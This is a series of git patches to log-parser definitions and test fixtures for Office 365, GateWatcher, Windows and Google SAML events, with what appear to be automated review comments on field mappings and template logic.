@@ -1,12 +1,12 @@ { "input": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 / Office 365", "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" } - }, - "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + } }, "expected": { "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json index 7f11fadc3..3c91bcb5d 100644 --- a/Office 365/o365/tests/operation_properties_02.json +++ b/Office 365/o365/tests/operation_properties_02.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 / Office 365", "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" } - }, - "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}" + } }, "expected": { "message": 
"{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", From 2c5909d2a02678580e98ccee0e606360c9ca9b9a Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Tue, 12 Nov 2024 17:01:51 +0100 Subject: [PATCH 218/317] Delete .vscode/settings.json Delete a unnecessary file --- .vscode/settings.json | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 .vscode/settings.json diff --git a/.vscode/settings.json b/.vscode/settings.json deleted file mode 100644 index b92839d53..000000000 --- a/.vscode/settings.json +++ /dev/null @@ -1,22 +0,0 @@ -{ - "workbench.colorCustomizations": { - "activityBar.activeBackground": "#65c89b", - "activityBar.background": "#65c89b", - "activityBar.foreground": "#15202b", - "activityBar.inactiveForeground": "#15202b99", - "activityBarBadge.background": "#945bc4", - "activityBarBadge.foreground": "#e7e7e7", - "commandCenter.border": "#15202b99", - "sash.hoverBorder": "#65c89b", - "statusBar.background": "#42b883", - "statusBar.foreground": "#15202b", - "statusBarItem.hoverBackground": "#359268", - "statusBarItem.remoteBackground": "#42b883", - "statusBarItem.remoteForeground": "#15202b", - "titleBar.activeBackground": "#42b883", - "titleBar.activeForeground": "#15202b", - "titleBar.inactiveBackground": "#42b88399", - "titleBar.inactiveForeground": "#15202b99" - }, - "peacock.color": "#42b883" -} \ No newline at end of file From 71bb0846a7cd6f72a28493543d4b1066215d3dcd Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Wed, 13 Nov 2024 10:52:05 +0100 Subject: [PATCH 219/317] Fixing tls and tls_* fields --- GateWatcher/aioniq/_meta/fields.yml | 13 +++++++++---- GateWatcher/aioniq/ingest/parser.yml | 5 +++-- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 7fb7e28af..07bae26e7 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml 
@@ -384,14 +384,19 @@ gatewatcher.tlp: name: gatewatcher.tlp type: text -gatewatcher.tls.sni: +gatewatcher.tls: + description: This field contains all TLS data fields in a TLS metadata + name: gatewatcher.tls + type: text + +gatewatcher.tls_sni: description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls.sni + name: gatewatcher.tls_sni type: text -gatewatcher.tls.fingerprint: +gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata - name: gatewatcher.tls.fingerprint + name: gatewatcher.tls_fingerprint type: text gatewatcher.ttp: diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index b71064e6d..3cc13d747 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -210,7 +210,8 @@ stages: tls.server.not_before: "{{json_load.message.tls.notbefore}}" tls.server.certificate_chain: "{{json_load.message.tls.chain}}" tls.server.subject: "{{json_load.message.tls.subject}}" - gatewatcher.tls.sni: "{{json_load.message.tls.sni}}" - gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" tls.version: "{{json_load.message.tls.version}}" tls.server.not_after: "{{json_load.message.tls.notafter}}" From ec5851efc208a5fa84e247079c402e3bb4b2472d Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 13 Nov 2024 15:45:33 +0100 Subject: [PATCH 220/317] refactor(Windows): merge source_ip and source_address into one stage --- Windows/windows/ingest/parser.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 988ae3dbc..f0bd6640b 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml 
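Review bot: Renaming `gatewatcher.tls.sni` and `gatewatcher.tls.fingerprint` to `gatewatcher.tls_sni` / `gatewatcher.tls_fingerprint` silently breaks any detection rule or saved query that references the old names, and the commit carries no changelog entry or deprecation note; a hint in each description, e.g. `description: This field represents the TLS SNI field in a TLS metadata (formerly gatewatcher.tls.sni)`, plus a changelog line would make the migration discoverable. The new `gatewatcher.tls: "{{json_load.message.tls}}"` renders a whole object through a string template into a field declared `type: text`; unless the engine serialises dict values itself, what lands there is the engine's string form of the dict rather than JSON, it duplicates data already mapped to `tls.server.*`, and an analysed `text` field is ill-suited to exact matching on the fingerprint it now also contains. If the intent is only to resolve the object/leaf mapping conflict on `gatewatcher.tls`, dropping the whole-object field and keeping the two leaf fields is the smaller change.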
@@ -153,8 +153,7 @@ pipeline: - name: set_file - name: set_user - name: process_ids - - name: source_ip - - name: source_address + - name: set_source_fields - name: action_outcome - name: set_dll filter: "{{ json.event.SourceName == 'Microsoft-Windows-Sysmon' and json.event.EventID == 7}}" @@ -1106,7 +1105,7 @@ stages: action.outcome: "failure" filter: "{{json.event.EventType == 'AUDIT_FAILURE' }}" - source_ip: + set_source_fields: actions: - set: source.ip: "{{json.event.SourceIp or json.event.SourceAddress}}" @@ -1131,8 +1130,6 @@ stages: - set: source.ip: "{{source_ip_ip_address.event.ip}}" - source_address: - actions: - set: source.address: "{{json.event.SourceIp}}" filter: "{{json.event.SourceIp | is_ipaddress}}" From 042e95418f89dd14ed87a57760af748a55ddbd75 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Wed, 13 Nov 2024 15:56:25 +0100 Subject: [PATCH 221/317] Add saml seervice to the parser --- Google Cloud/google-report/_meta/fields.yml | 15 +++ .../_meta/smart-descriptions.json | 114 ++++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 20 +++ .../tests/test_saml_login_success.json | 63 ++++++++++ .../tests/test_saml_login_success_1.json | 63 ++++++++++ 5 files changed, 275 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_saml_login_success.json create mode 100644 Google Cloud/google-report/tests/test_saml_login_success_1.json diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..ad86f9169 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml 
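Review bot: In the merged `set_source_fields` stage, `source.address` is still taken only from `json.event.SourceIp` (`filter: "{{json.event.SourceIp | is_ipaddress}}"`) while `source.ip` at the top of the same stage falls back to `SourceAddress`, so an event carrying only `SourceAddress` ends up with `source.ip` set and no `source.address`. Now that both paths live in one stage, mirror the fallback: `source.address: "{{json.event.SourceIp or json.event.SourceAddress}}"` with `filter: "{{(json.event.SourceIp or json.event.SourceAddress) | is_ipaddress}}"`. The actions between the two hunks (around the `source_ip_ip_address` lookup) are outside this view, so there may be an address assignment there I cannot see.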
@@ -42,3 +42,18 @@ google.report.token.type:
 description: Token type
 name: google.report.token.type
 type: keyword
+
+google.report.saml.status_code:
+ description: SAML response status
+ name: google.report.saml.status_code
+ type: keyword
+
+google.report.saml.initiator:
+ description: SAML requester of saml authentication
+ name: google.report.saml.initiator
+ type: keyword
+
+google.report.saml.application_name:
+ description: Saml SP application name
+ name: google.report.saml.application_name
+ type: keyword
diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 6a934ee3d..6fa8c709a 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json
@@ -168,6 +168,120 @@ } ] }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + }, + { + "field": "google.report.saml.status_code" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + 
}, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..e00c5ee79 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -28,6 +28,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_saml_fields + filter: '{{ json_event.message.id.applicationName == "saml"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' 
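Review bot: Two of the new SAML descriptions can never fire and one is a duplicate: the third entry (`User {user.email} successfully logged in by {network.application} service`) has exactly the same conditions as the second, including `google.report.saml.application_name`, so the second always wins and the application-less fallback it was meant to be is dead; removing that `application_name` condition from it restores the fallback. The fourth entry renders `{event.reason}` but its conditions require `google.report.saml.application_name` (which its text does not use) and not `event.reason`, so it matches failures with no reason and prints an empty placeholder; its condition should be `{"field": "event.reason"}` instead. The last entry is a byte-for-byte copy of the fourth and should be dropped.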
@@ -258,3 +260,21 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_saml_fields: + actions: + - set: + event.category: ["authentication"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "device_id" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["allowed"] + filter: '{{ json_event.message.events[0].name == "login_success"}}' + + - set: + event.type: ["denied"] + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json new file mode 100644 index 000000000..a96c1fab6 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success.json 
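Review bot: The parameter scans in `set_saml_fields` (`{% for param in json_event.message.events[0].parameters %}{% if param.name == "…" %}{{param.value}}{% endif %}{% endfor %}`) render an empty string when the named parameter is absent and concatenate values if the same name appears twice, and they only inspect `events[0]`; if the engine keeps empty strings, `device.id`, the `google.report.saml.*` fields and `event.reason` will be set to `""` on events lacking the parameter — confirm, or guard each with a presence `filter:` the way the `event.type` actions are guarded. `event.category: ["authentication"]` is applied to every `saml` event regardless of `events[0].name`, presumably intended since this application only reports logins, but worth a one-line comment such as `# all saml report events are login attempts`. Only `login_success` fixtures are added in this commit; the `login_failure` branch, which also fills `event.reason` from `failure_type`, has no test covering it.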
@@ -0,0 +1,63 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:26:15.515000Z", + "cloud": { + "account": { + "id": "C00000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, 
+ "related": { + "ip": [ + "2.1.3.2" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "2.1.3.2", + "ip": "2.1.3.2" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "10344515534360000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json new file mode 100644 index 000000000..94e5f299f --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json 
